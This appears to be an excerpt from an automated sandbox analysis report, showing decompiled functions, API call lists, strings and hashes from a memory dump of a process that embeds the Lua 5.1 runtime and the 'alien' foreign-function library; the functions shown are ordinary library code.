0x1001157b
0x1001158b
0x10011590
0x10011590
0x10011596
0x10011598
0x1001159b
0x1001159d
0x100115a6
0x100115ab
0x100115ab
0x100115b1
0x100115b6
0x100115b9
0x100115c2
0x100115c7
0x100115d5
0x10011499
0x100114a2
0x100114b5
0x100114b5
0x10011426
0x10011427
0x1001143a
0x1001143a
0x10011424

APIs

Part of subcall function 10011630: lua_type.LUA5.1(?,00000001,?,100113D5,?,?), ref: 10011638
Part of subcall function 10011630: lua_tothread.LUA5.1(?,00000001), ref: 10011652

luaL_optlstring.LUA5.1(?,?,flnSu,00000000,?,?), ref: 100113E7

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

lua_isnumber.LUA5.1(?,?,?,?,flnSu,00000000,?,?), ref: 100113F8
lua_tointeger.LUA5.1(?,?,?), ref: 10011410
lua_getstack.LUA5.1(00000000,00000000,?,?), ref: 1001141A
lua_pushnil.LUA5.1(?,?,?,?,?,?), ref: 10011427
lua_type.LUA5.1(?,?), ref: 10011442
lua_pushfstring.LUA5.1(?,>%s,00000000), ref: 1001145A
lua_tolstring.LUA5.1(?,000000FF,00000000,?,>%s,00000000), ref: 10011464
lua_pushvalue.LUA5.1(?,?,?,000000FF,00000000,?,>%s,00000000), ref: 10011475
lua_xmove.LUA5.1(?,00000000,00000001,?,?,?,000000FF,00000000,?,>%s,00000000), ref: 1001147E
lua_getinfo.LUA5.1(00000000,00000000,?), ref: 1001148D
luaL_argerror.LUA5.1(?,?,invalid option), ref: 100114A7
lua_createtable.LUA5.1(?,00000000,00000002), ref: 100114BC
strchr.MSVCRT ref: 100114CA
strchr.MSVCRT ref: 10011529
strchr.MSVCRT ref: 10011548
strchr.MSVCRT ref: 10011567
strchr.MSVCRT ref: 10011596
strchr.MSVCRT ref: 100115B1

Strings

func, xrefs: 100115BB
>%s, xrefs: 10011454
currentline, xrefs: 10011537
linedefined, xrefs: 100114F8
activelines, xrefs: 1001159F
name, xrefs: 10011575
namewhat, xrefs: 10011585
short_src, xrefs: 100114E8
invalid option, xrefs: 1001149D
nups, xrefs: 10011556
lastlinedefined, xrefs: 10011508
what, xrefs: 10011518
flnSu, xrefs: 100113DE
function or level expected, xrefs: 100115DA
source, xrefs: 100114D8

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: strchr$lua_type.$L_argerror.L_optlstring.lua_createtable.lua_getinfo.lua_getstack.lua_isnumber.lua_pushfstring.lua_pushnil.lua_pushvalue.lua_tointeger.lua_tolstring.lua_tothread.lua_xmove.
String ID: >%s$activelines$currentline$flnSu$func$function or level expected$invalid option$lastlinedefined$linedefined$name$namewhat$nups$short_src$source$what
API String ID: 1244025024-173008909
Opcode ID: 2180022b42c24f45a69d383a95ea785f7e400827b386c4485b2d8565fbf1f821
Instruction ID: a5668306caa951a443f434f69463e46911263ed492c58660a3578b966535d9d0
Opcode Fuzzy Hash: 2180022b42c24f45a69d383a95ea785f7e400827b386c4485b2d8565fbf1f821
Instruction Fuzzy Hash: 9551A7A99046107BE116D6609C43FFF32DCDFC6685F044118FE059A143FA7AFE8642B6

Uniqueness

Uniqueness Score: -1.00%

Function 10016B60, Relevance: 59.6, APIs: 19, Strings: 15, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016B60(void* __ebx, void* __ecx, void* __edi, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr* _t27;
				void* _t29;
				void* _t31;
				void* _t34;
				void* _t35;
				void* _t42;

				_t42 = __fp0;
				_t39 = __eflags;
				_t29 = __ecx;
				_t33 = _a4;
				E1000F310(__eflags, _a4, "_LOADLIB");
				E10001A20(_t33, E10016CB0, 0);
				E10001DD0(_t29, _t39, _t33, 0xfffffffe, "__gc");
				E1000F6F0(_t33, "package", 0x10017a40);
				E100013D0(_t39, _t33, 0xffffffff);
				E10001300(_t33, 0xffffd8ef);
				E10001C70(_t33, 0, 4);
				_t10 =  *0x10017a70; // 0x10016700
				_t35 = _t34 + 0x48;
				_t40 = _t10;
				if(_t10 != 0) {
					_t31 = 1;
					_t27 = 0x10017a70;
					do {
						E10001A20(_t33, _t10, 0);
						E10001EB0(_t40, _t33, 0xfffffffe, _t31);
						_t2 = _t27 + 4; // 0x100163a0
						_t10 =  *_t2;
						_t27 = _t27 + 4;
						_t35 = _t35 + 0x18;
						_t31 = _t31 + 1;
						_t41 = _t10;
					} while (_t10 != 0);
				}
				E10001DD0(_t29, _t41, _t33, 0xfffffffe, "loaders");
				E10016CF0(_t33, "path", "LUA_PATH", ".\\?.lua;!\\lua\\?.lua;!\\lua\\?\\init.lua;!\\?.lua;!\\?\\init.lua");
				E10016CF0(_t33, "cpath", "LUA_CPATH", ".\\?.dll;!\\?.dll;!\\loadall.dll");
				E10001930(_t33, "\\\n;\n?\n!\n-", 9);
				E10001DD0(_t29, _t41, _t33, 0xfffffffe, "config");
				E1000F900(_t29, _t41, _t42, _t33, 0xffffd8f0, "_LOADED", 2);
				E10001DD0(_t29, _t41, _t33, 0xfffffffe, "loaded");
				E10001C70(_t33, 0, 0);
				E10001DD0(_t29, _t41, _t33, 0xfffffffe, "preload");
				E100013D0(_t41, _t33, 0xffffd8ee);
				E1000F6F0(_t33, 0, 0x10017a58);
				E10001160(_t33, 0xfffffffe);
				return 1;
			}

0x10016b60
0x10016b60
0x10016b60
0x10016b61
0x10016b6b
0x10016b78
0x10016b85
0x10016b95
0x10016b9d
0x10016ba8
0x10016bb2
0x10016bb7
0x10016bbc
0x10016bbf
0x10016bc1
0x10016bc5
0x10016bca
0x10016bcf
0x10016bd3
0x10016bdc
0x10016be1
0x10016be1
0x10016be4
0x10016be7
0x10016bea
0x10016beb
0x10016beb
0x10016bf0
0x10016bf9
0x10016c0e
0x10016c23
0x10016c30
0x10016c3d
0x10016c52
0x10016c5f
0x10016c69
0x10016c76
0x10016c81
0x10016c8e
0x10016c99
0x10016ca7

APIs

luaL_newmetatable.LUA5.1(?,_LOADLIB), ref: 10016B6B

Part of subcall function 1000F310: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 1000F321
Part of subcall function 1000F310: lua_type.LUA5.1(?,000000FF,?,FFFFD8F0,?), ref: 1000F329

lua_pushcclosure.LUA5.1(?,10016CB0,00000000,?,_LOADLIB), ref: 10016B78
lua_setfield.LUA5.1(?,000000FE,__gc,?,10016CB0,00000000,?,_LOADLIB), ref: 10016B85

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

luaL_register.LUA5.1(?,package,10017A40,?,000000FE,__gc,?,10016CB0,00000000,?,_LOADLIB), ref: 10016B95

Part of subcall function 1000F6F0: luaL_openlib.LUA5.1(?,?,?,00000000), ref: 1000F701

lua_pushvalue.LUA5.1(?,000000FF,?,package,10017A40,?,000000FE,__gc,?,10016CB0,00000000,?,_LOADLIB), ref: 10016B9D
lua_replace.LUA5.1(?,FFFFD8EF,?,000000FF,?,package,10017A40,?,000000FE,__gc,?,10016CB0,00000000,?,_LOADLIB), ref: 10016BA8
lua_createtable.LUA5.1(?,00000000,00000004,?,FFFFD8EF,?,000000FF,?,package,10017A40,?,000000FE,__gc,?,10016CB0,00000000), ref: 10016BB2
lua_pushcclosure.LUA5.1(?,10016700,00000000), ref: 10016BD3
lua_rawseti.LUA5.1(?,000000FE,00000001,?,10016700,00000000), ref: 10016BDC
lua_setfield.LUA5.1(?,000000FE,loaders), ref: 10016BF9
lua_pushlstring.LUA5.1(?,\;?!-,00000009,?,cpath,LUA_CPATH,.\?.dll;!\?.dll;!\loadall.dll,?,path,LUA_PATH,.\?.lua;!\lua\?.lua;!\lua\?\init.lua;!\?.lua;!\?\init.lua,?,000000FE,loaders), ref: 10016C30
lua_setfield.LUA5.1(?,000000FE,config,?,\;?!-,00000009,?,cpath,LUA_CPATH,.\?.dll;!\?.dll;!\loadall.dll,?,path,LUA_PATH,.\?.lua;!\lua\?.lua;!\lua\?\init.lua;!\?.lua;!\?\init.lua,?,000000FE), ref: 10016C3D
luaL_findtable.LUA5.1(?,FFFFD8F0,_LOADED,00000002), ref: 10016C52
lua_setfield.LUA5.1(?,000000FE,loaded,?,FFFFD8F0,_LOADED,00000002), ref: 10016C5F
lua_createtable.LUA5.1(?,00000000,00000000,?,000000FE,loaded,?,FFFFD8F0,_LOADED,00000002), ref: 10016C69
lua_setfield.LUA5.1(?,000000FE,preload,?,00000000,00000000,?,000000FE,loaded,?,FFFFD8F0,_LOADED,00000002), ref: 10016C76
lua_pushvalue.LUA5.1(?,FFFFD8EE,?,000000FE,preload,?,00000000,00000000,?,000000FE,loaded,?,FFFFD8F0,_LOADED,00000002), ref: 10016C81
luaL_register.LUA5.1(?,00000000,10017A58,?,FFFFD8EE,?,000000FE,preload,?,00000000,00000000,?,000000FE,loaded,?,FFFFD8F0), ref: 10016C8E
lua_settop.LUA5.1(?,000000FE), ref: 10016C99

Strings

__gc, xrefs: 10016B7D
loaders, xrefs: 10016BF1
LUA_CPATH, xrefs: 10016C18
config, xrefs: 10016C35
\;?!-, xrefs: 10016C2A
package, xrefs: 10016B8F
loaded, xrefs: 10016C57
.\?.dll;!\?.dll;!\loadall.dll, xrefs: 10016C13
preload, xrefs: 10016C6E
_LOADLIB, xrefs: 10016B65
_LOADED, xrefs: 10016C47
.\?.lua;!\lua\?.lua;!\lua\?\init.lua;!\?.lua;!\?\init.lua, xrefs: 10016BFE
path, xrefs: 10016C08
cpath, xrefs: 10016C1D
LUA_PATH, xrefs: 10016C03

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_setfield.$L_register.lua_createtable.lua_pushcclosure.lua_pushvalue.$L_findtable.L_newmetatable.L_openlib.S_newlstr.lua_getfield.lua_pushlstring.lua_rawseti.lua_replace.lua_settop.lua_type.
String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;!\?.lua;!\?\init.lua$LUA_CPATH$LUA_PATH$\;?!-$_LOADED$_LOADLIB$__gc$config$cpath$loaded$loaders$package$path$preload
API String ID: 2076105280-613600958
Opcode ID: fccfe7507e4015a09428cb39546fa03827132bc0860453d08b7dfdff75e11706
Instruction ID: 45d2f80ce8b1da238f6b06904cf8ead03f74a1aecb3a029d8e9d8836a334715c
Opcode Fuzzy Hash: fccfe7507e4015a09428cb39546fa03827132bc0860453d08b7dfdff75e11706
Instruction Fuzzy Hash: 3B21347868A52135F402E2286E02FDF1089CF976E5F600310B6267C5DB9FA9F6C251AF

Uniqueness

Uniqueness Score: -1.00%

Function 00A214C0, Relevance: 58.2, APIs: 31, Strings: 2, Instructions: 411
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00A214C0(signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v12;
				signed int _v16;
				signed short _t105;
				signed int _t106;
				signed int _t109;
				intOrPtr _t114;
				signed int _t125;
				intOrPtr _t129;
				signed int _t132;
				void* _t135;

				_t129 = _a16;
				_push( *((intOrPtr*)(_t129 + 0x3c)));
				_push(0xffffd8f0);
				_push( *((intOrPtr*)(_t129 + 0x38)));
				L00A23F86();
				_t105 =  *(_t129 + 0x2c);
				_t135 = (_t132 & 0xffffffc0) - 0x34 + 0xc;
				_t125 = 0;
				_v16 = _t105;
				if(_t105 > 0) {
					_t114 = _a12;
					do {
						_t109 =  *( *((intOrPtr*)(_t129 + 0x30)) + _t125 * 4);
						if(_t109 > 0x10) {
							L25:
							_push("alien: unknown parameter type in callback");
							_push( *((intOrPtr*)(_t129 + 0x38)));
							L00A23F26();
							goto L26;
						} else {
							switch( *((intOrPtr*)(_t109 * 4 +  &M00A21910))) {
								case 0:
									__eax =  *(__ebx + __edi * 4);
									_v12 =  *__eax;
									asm("fild dword [esp+0x38]");
									goto L5;
								case 1:
									__edx =  *( *(__ebx + __edi * 4)) & 0x0000ffff;
									__eax =  *(__esi + 0x38);
									_v12 =  *( *(__ebx + __edi * 4)) & 0x0000ffff;
									__esp = __esp - 8;
									asm("fild dword [esp+0x40]");
									 *__esp = __fp0;
									_push(__eax);
									L00A23F80();
									__esp =  &(__esp[0xc]);
									goto L27;
								case 2:
									__edx =  *(__ebx + __edi * 4);
									asm("fild dword [edx]");
									__eax =  *(__esi + 0x38);
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__eax);
									L00A23F80();
									__esp =  &(__esp[0xc]);
									goto L27;
								case 3:
									__edx =  *( *(__ebx + __edi * 4));
									asm("fild dword [ecx]");
									if( *( *(__ebx + __edi * 4)) < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__eax =  *(__esi + 0x38);
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__eax);
									L00A23F80();
									__esp =  &(__esp[0xc]);
									goto L27;
								case 4:
									__eax =  *(__ebx + __edi * 4);
									asm("fild dword [eax]");
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push( *(__esi + 0x38));
									L00A23F80();
									__esp =  &(__esp[0xc]);
									goto L27;
								case 5:
									goto L25;
								case 6:
									__fp0 =  *( *(__ebx + __edi * 4));
									goto L5;
								case 7:
									__eax =  *(__ebx + __edi * 4);
									__fp0 =  *__eax;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push( *(__esi + 0x38));
									L00A23F80();
									__esp =  &(__esp[0xc]);
									goto L27;
								case 8:
									__eax =  *(__ebx + __edi * 4);
									_v12 =  *__eax & 0x000000ff;
									asm("fild dword [esp+0x38]");
									goto L5;
								case 9:
									_v12 =  *((char*)( *((intOrPtr*)(_t114 + _t125 * 4))));
									asm("fild dword [esp+0x38]");
									goto L5;
								case 0xa:
									__edx =  *(__ebx + __edi * 4);
									__eax =  *( *(__ebx + __edi * 4));
									_push(__eax);
									_push( *(__esi + 0x38));
									L00A23EF0();
									goto L26;
								case 0xb:
									__eax =  *( *(__ebx + __edi * 4));
									if(__eax == 0) {
										__eax =  *(__esi + 0x38);
										_push(__eax);
										L00A23F74();
										__esp =  &(__esp[4]);
									} else {
										__edx =  *(__esi + 0x38);
										_push(__eax);
										_push( *(__esi + 0x38));
										L00A23F7A();
										L26:
										_t135 = _t135 + 8;
									}
									goto L27;
								case 0xc:
									__edx =  *(__ebx + __edi * 4);
									__eax =  *( *(__ebx + __edi * 4));
									asm("fild dword [eax]");
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push( *(__esi + 0x38));
									L00A23F80();
									__esp =  &(__esp[0xc]);
									goto L27;
								case 0xd:
									__edx =  *(__ebx + __edi * 4);
									__eax =  *( *(__ebx + __edi * 4));
									asm("fild dword [eax]");
									if( *__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									L5:
									_t139 = _t135 - 8;
									 *_t139 = _t144;
									_push( *((intOrPtr*)(_t129 + 0x38)));
									L00A23F80();
									_t135 = _t139 + 0xc;
									goto L27;
								case 0xe:
									__eax =  *(__ebx + __edi * 4);
									__edx =  *( *( *(__ebx + __edi * 4))) & 0x000000ff;
									__eax =  *(__esi + 0x38);
									_v12 =  *( *( *(__ebx + __edi * 4))) & 0x000000ff;
									__esp = __esp - 8;
									asm("fild dword [esp+0x40]");
									 *__esp = __fp0;
									_push(__eax);
									L00A23F80();
									__esp =  &(__esp[0xc]);
									goto L27;
								case 0xf:
									__edx =  *( *(__ebx + __edi * 4));
									__fp0 =  *( *( *(__ebx + __edi * 4)));
									__eax =  *(__esi + 0x38);
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__eax);
									L00A23F80();
									__esp =  &(__esp[0xc]);
									goto L27;
							}
						}
						L27:
						_t125 = _t125 + 1;
					} while (_t125 < _v16);
					_t105 = _v16;
				}
				_push(1);
				_push(_t105);
				_push( *((intOrPtr*)(_t129 + 0x38)));
				L00A23F6E();
				_t106 =  *(_t129 + 0xc);
				if(_t106 > 0xc) {
					_push("alien: unknown return type in callback");
					_push( *((intOrPtr*)(_t129 + 0x38)));
					L00A23F26();
					goto L49;
				} else {
					switch( *((intOrPtr*)(_t106 * 4 +  &M00A21954))) {
						case 0:
							_push(0xffffffff);
							_push( *((intOrPtr*)(_t129 + 0x38)));
							L00A23F68();
							_t108 = E00A245C0( *((intOrPtr*)(_t129 + 0x38)), _t144);
							 *_a8 = _t108;
							return _t108;
							goto L50;
						case 1:
							__edx =  *(__esi + 0x38);
							_push(0xffffffff);
							_push( *(__esi + 0x38));
							L00A23F68();
							asm("fnstcw word [esp+0x3c]");
							__eax = _v16 & 0x0000ffff;
							__edx = _a8;
							__esp =  &(__esp[8]);
							__eax = _v16 & 0x0000ffff | 0x00000c00;
							_v12 = __eax;
							asm("fldcw word [esp+0x38]");
							asm("fistp dword [esp+0x38]");
							 *_a8 = _v12 & 0x0000ffff;
							asm("fldcw word [esp+0x34]");
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __eax;
							goto L50;
						case 2:
							__edx =  *(__esi + 0x38);
							_push(0xffffffff);
							_push( *(__esi + 0x38));
							goto L33;
						case 3:
							__eax =  *(__esi + 0x38);
							_push(0xffffffff);
							_push( *(__esi + 0x38));
							L00A23F68();
							asm("fnstcw word [esp+0x3c]");
							__eax = _v16 & 0x0000ffff;
							__edx = _a8;
							__esp =  &(__esp[8]);
							__eax = _v16 & 0x0000ffff | 0x00000c00;
							_v12 = __eax;
							asm("fldcw word [esp+0x38]");
							asm("fistp qword [esp+0x38]");
							 *_a8 = _v12;
							asm("fldcw word [esp+0x34]");
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __eax;
							goto L50;
						case 4:
							__eax =  *(__esi + 0x38);
							_push(0xffffffff);
							_push(__eax);
							L33:
							L00A23F68();
							__esp =  &(__esp[8]);
							__eax = E00A245C0(__eax, __fp0);
							 *_a8 = __eax;
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __eax;
							goto L50;
						case 5:
							__eax =  *(__esi + 0x38);
							_push(0xffffffff);
							_push( *(__esi + 0x38));
							L00A23F68();
							asm("fnstcw word [esp+0x3c]");
							__eax = _v16 & 0x0000ffff;
							__edx = _a8;
							__esp =  &(__esp[8]);
							__eax = _v16 & 0x0000ffff | 0x00000c00;
							_v12 = __eax;
							asm("fldcw word [esp+0x38]");
							asm("fistp qword [esp+0x38]");
							 *_a8 = _v12;
							asm("fldcw word [esp+0x34]");
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __eax;
							goto L50;
						case 6:
							L49:
							return _t106;
							goto L50;
						case 7:
							__eax =  *(__esi + 0x38);
							_push(0xffffffff);
							_push(__eax);
							L00A23F68();
							 *_a8 = __fp0;
							__esp =  &(__esp[8]);
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __eax;
							goto L50;
						case 8:
							__edx =  *(__esi + 0x38);
							_push(0xffffffff);
							_push( *(__esi + 0x38));
							L00A23F68();
							__eax = _a8;
							 *__eax = __fp0;
							__esp =  &(__esp[8]);
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __eax;
							goto L50;
						case 9:
							__eax =  *(__esi + 0x38);
							_push(0xffffffff);
							_push(__eax);
							L00A23F62();
							__edx = _a8;
							 *_a8 = __al & 0x000000ff;
							__esp =  &(__esp[8]);
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __eax;
							goto L50;
						case 0xa:
							__eax =  *(__esi + 0x38);
							_push(0xffffffff);
							_push(__eax);
							L00A23F62();
							__edx = _a8;
							 *_a8 = __al;
							__esp =  &(__esp[8]);
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __eax;
							goto L50;
						case 0xb:
							_push(0xffffffff);
							_push( *(__esi + 0x38));
							L00A23F50();
							__edx =  *(__esi + 0x38);
							__esp =  &(__esp[8]);
							if(__eax == 0) {
								_push(0);
								_push(0xffffffff);
								_push(__edx);
								L00A23F5C();
								__esp =  &(__esp[0xc]);
								 *_a8 = __eax;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							} else {
								_push(0xffffffff);
								_push(__edx);
								L00A23F0E();
								 *_a8 = __eax;
								__esp =  &(__esp[8]);
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
							goto L50;
						case 0xc:
							__edx =  *(__esi + 0x38);
							_push(0xffffffff);
							_push( *(__esi + 0x38));
							L00A23F56();
							__esp =  &(__esp[8]);
							if(__eax == 0) {
								__edx =  *(__esi + 0x38);
								_push(0xffffffff);
								_push( *(__esi + 0x38));
								L00A23F0E();
								 *_a8 = __eax;
								__esp =  &(__esp[8]);
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							} else {
								__eax =  *(__esi + 0x38);
								_push(0);
								_push(0xffffffff);
								_push(__eax);
								L00A23F5C();
								__esp =  &(__esp[0xc]);
								 *_a8 = __eax;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
							goto L50;
					}
				}
				L50:
			}

0x00a214cb
0x00a214d5
0x00a214d6
0x00a214db
0x00a214dc
0x00a214e1
0x00a214e4
0x00a214e7
0x00a214eb
0x00a214ef
0x00a214f5
0x00a21500
0x00a21503
0x00a21509
0x00a216b6
0x00a216b9
0x00a216be
0x00a216bf
0x00000000
0x00a2150f
0x00a2150f
0x00000000
0x00a2154b
0x00a21551
0x00a21555
0x00000000
0x00000000
0x00a21596
0x00a21599
0x00a2159c
0x00a215a0
0x00a215a3
0x00a215a7
0x00a215aa
0x00a215ab
0x00a215b0
0x00000000
0x00000000
0x00a21577
0x00a2157a
0x00a2157c
0x00a2157f
0x00a21582
0x00a21585
0x00a21586
0x00a2158b
0x00000000
0x00000000
0x00a215bb
0x00a215bd
0x00a215c1
0x00a215c3
0x00a215c3
0x00a215c9
0x00a215cc
0x00a215cf
0x00a215d2
0x00a215d3
0x00a215d8
0x00000000
0x00000000
0x00a2155b
0x00a2155e
0x00a21563
0x00a21566
0x00a21569
0x00a2156a
0x00a2156f
0x00000000
0x00000000
0x00000000
0x00000000
0x00a215e3
0x00000000
0x00000000
0x00a215ea
0x00a215ed
0x00a215f2
0x00a215f5
0x00a215f8
0x00a215f9
0x00a215fe
0x00000000
0x00000000
0x00a2153b
0x00a21541
0x00a21545
0x00000000
0x00000000
0x00a2151c
0x00a21520
0x00000000
0x00000000
0x00a21606
0x00a21609
0x00a2160e
0x00a2160f
0x00a21610
0x00000000
0x00000000
0x00a21696
0x00a2169a
0x00a216a8
0x00a216ab
0x00a216ac
0x00a216b1
0x00a2169c
0x00a2169c
0x00a2169f
0x00a216a0
0x00a216a1
0x00a216c4
0x00a216c4
0x00a216c4
0x00000000
0x00000000
0x00a2161a
0x00a2161d
0x00a2161f
0x00a21624
0x00a21627
0x00a2162a
0x00a2162b
0x00a21630
0x00000000
0x00000000
0x00a21638
0x00a2163b
0x00a2163f
0x00a21643
0x00a21649
0x00a21649
0x00a21524
0x00a21527
0x00a2152a
0x00a2152d
0x00a2152e
0x00a21533
0x00000000
0x00000000
0x00a21654
0x00a21659
0x00a2165c
0x00a2165f
0x00a21663
0x00a21666
0x00a2166a
0x00a2166d
0x00a2166e
0x00a21673
0x00000000
0x00000000
0x00a2167b
0x00a2167d
0x00a2167f
0x00a21682
0x00a21685
0x00a21688
0x00a21689
0x00a2168e
0x00000000
0x00000000
0x00a2150f
0x00a216c7
0x00a216c7
0x00a216ca
0x00a216d4
0x00a216d4
0x00a216db
0x00a216dd
0x00a216de
0x00a216df
0x00a216e4
0x00a216ed
0x00a218f9
0x00a218fe
0x00a218ff
0x00000000
0x00a216f3
0x00a216f3
0x00000000
0x00a216fd
0x00a216ff
0x00a21700
0x00a21708
0x00a21713
0x00a2171b
0x00000000
0x00000000
0x00a21743
0x00a21746
0x00a21748
0x00a21749
0x00a2174e
0x00a21752
0x00a21757
0x00a2175a
0x00a2175d
0x00a21762
0x00a21766
0x00a2176a
0x00a21776
0x00a21778
0x00a2177c
0x00a2177d
0x00a2177e
0x00a21782
0x00000000
0x00000000
0x00a2173b
0x00a2173e
0x00a21740
0x00000000
0x00000000
0x00a217bf
0x00a217c2
0x00a217c4
0x00a217c5
0x00a217ca
0x00a217ce
0x00a217d3
0x00a217d6
0x00a217d9
0x00a217de
0x00a217e2
0x00a217e6
0x00a217ee
0x00a217f0
0x00a217f4
0x00a217f5
0x00a217f6
0x00a217fa
0x00000000
0x00000000
0x00a2171c
0x00a2171f
0x00a21721
0x00a21722
0x00a21722
0x00a21727
0x00a2172a
0x00a21732
0x00a21734
0x00a21735
0x00a21736
0x00a2173a
0x00000000
0x00000000
0x00a21783
0x00a21786
0x00a21788
0x00a21789
0x00a2178e
0x00a21792
0x00a21797
0x00a2179a
0x00a2179d
0x00a217a2
0x00a217a6
0x00a217aa
0x00a217b2
0x00a217b4
0x00a217b8
0x00a217b9
0x00a217ba
0x00a217be
0x00000000
0x00000000
0x00a21907
0x00a2190d
0x00000000
0x00000000
0x00a21835
0x00a21838
0x00a2183a
0x00a2183b
0x00a21843
0x00a21845
0x00a21848
0x00a21849
0x00a2184a
0x00a2184e
0x00000000
0x00000000
0x00a2184f
0x00a21852
0x00a21854
0x00a21855
0x00a2185a
0x00a2185d
0x00a2185f
0x00a21862
0x00a21863
0x00a21864
0x00a21868
0x00000000
0x00000000
0x00a217fb
0x00a217fe
0x00a21800
0x00a21801
0x00a21806
0x00a2180c
0x00a2180e
0x00a21811
0x00a21812
0x00a21813
0x00a21817
0x00000000
0x00000000
0x00a21818
0x00a2181b
0x00a2181d
0x00a2181e
0x00a21823
0x00a21829
0x00a2182b
0x00a2182e
0x00a2182f
0x00a21830
0x00a21834
0x00000000
0x00000000
0x00a2186c
0x00a2186e
0x00a2186f
0x00a21874
0x00a21877
0x00a2187c
0x00a21895
0x00a21897
0x00a21899
0x00a2189a
0x00a218a2
0x00a218a5
0x00a218a7
0x00a218a8
0x00a218a9
0x00a218ad
0x00a2187e
0x00a2187e
0x00a21880
0x00a21881
0x00a21889
0x00a2188b
0x00a2188e
0x00a2188f
0x00a21890
0x00a21894
0x00a21894
0x00000000
0x00000000
0x00a218ae
0x00a218b1
0x00a218b3
0x00a218b4
0x00a218b9
0x00a218be
0x00a218dc
0x00a218df
0x00a218e1
0x00a218e2
0x00a218ea
0x00a218ec
0x00a218ef
0x00a218f0
0x00a218f1
0x00a218f5
0x00a218c0
0x00a218c0
0x00a218c3
0x00a218c5
0x00a218c7
0x00a218c8
0x00a218d0
0x00a218d3
0x00a218d5
0x00a218d6
0x00a218d7
0x00a218db
0x00a218db
0x00000000
0x00000000
0x00a216f3
0x00000000

APIs

lua_rawgeti.LUA5.1(?,FFFFD8F0,?), ref: 00A214DC
lua_pushnumber.LUA5.1(?), ref: 00A2152E
lua_pushnumber.LUA5.1(?), ref: 00A2156A
lua_pushnumber.LUA5.1(?), ref: 00A21586
lua_pushnumber.LUA5.1(?), ref: 00A215AB
lua_pushnumber.LUA5.1(?), ref: 00A215D3
lua_pushnumber.LUA5.1(?), ref: 00A215F9
lua_pushstring.LUA5.1(?,00000000), ref: 00A21610
lua_pushnumber.LUA5.1(?,?,00000000), ref: 00A2162B
lua_pushnumber.LUA5.1(?), ref: 00A2166E
lua_pushnumber.LUA5.1(?), ref: 00A21689
lua_pushlightuserdata.LUA5.1(?,00000000,?,00000000), ref: 00A216A1
lua_pushnil.LUA5.1(?,?,00000000), ref: 00A216AC
luaL_error.LUA5.1(?,alien: unknown parameter type in callback), ref: 00A216BF
lua_call.LUA5.1(?,?,00000001), ref: 00A216DF
lua_tonumber.LUA5.1(?,000000FF), ref: 00A21700
lua_tonumber.LUA5.1(?,000000FF), ref: 00A21722
lua_tonumber.LUA5.1(?,000000FF), ref: 00A21749
lua_tonumber.LUA5.1(?,000000FF), ref: 00A21789
lua_tonumber.LUA5.1(?,000000FF), ref: 00A217C5
lua_tointeger.LUA5.1(?,000000FF), ref: 00A21801
lua_tointeger.LUA5.1(?,000000FF), ref: 00A2181E
lua_tonumber.LUA5.1(?,000000FF), ref: 00A2183B
lua_tonumber.LUA5.1(?,000000FF), ref: 00A21855
lua_isuserdata.LUA5.1(?,000000FF), ref: 00A2186F
lua_touserdata.LUA5.1(?,000000FF), ref: 00A21881
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 00A2189A
lua_isstring.LUA5.1(?,000000FF), ref: 00A218B4
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 00A218C8
lua_touserdata.LUA5.1(?,000000FF), ref: 00A218E2
luaL_error.LUA5.1(?,alien: unknown return type in callback), ref: 00A218FF

Strings

alien: unknown return type in callback, xrefs: 00A218F9
alien: unknown parameter type in callback, xrefs: 00A216B9

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

